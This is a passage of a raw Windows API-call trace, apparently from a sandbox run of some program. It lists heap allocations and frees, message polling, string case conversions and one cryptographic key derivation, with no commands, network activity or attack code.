Flags=0x0, Size=0x24) returned 0x249f170 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.667] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.668] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.668] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.668] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.668] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.669] CryptHashData (hHash=0xaa5660, pbData=0x24b1738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.670] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.670] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.670] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.670] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.671] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.671] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.671] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.676] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.676] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.676] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.677] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.677] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 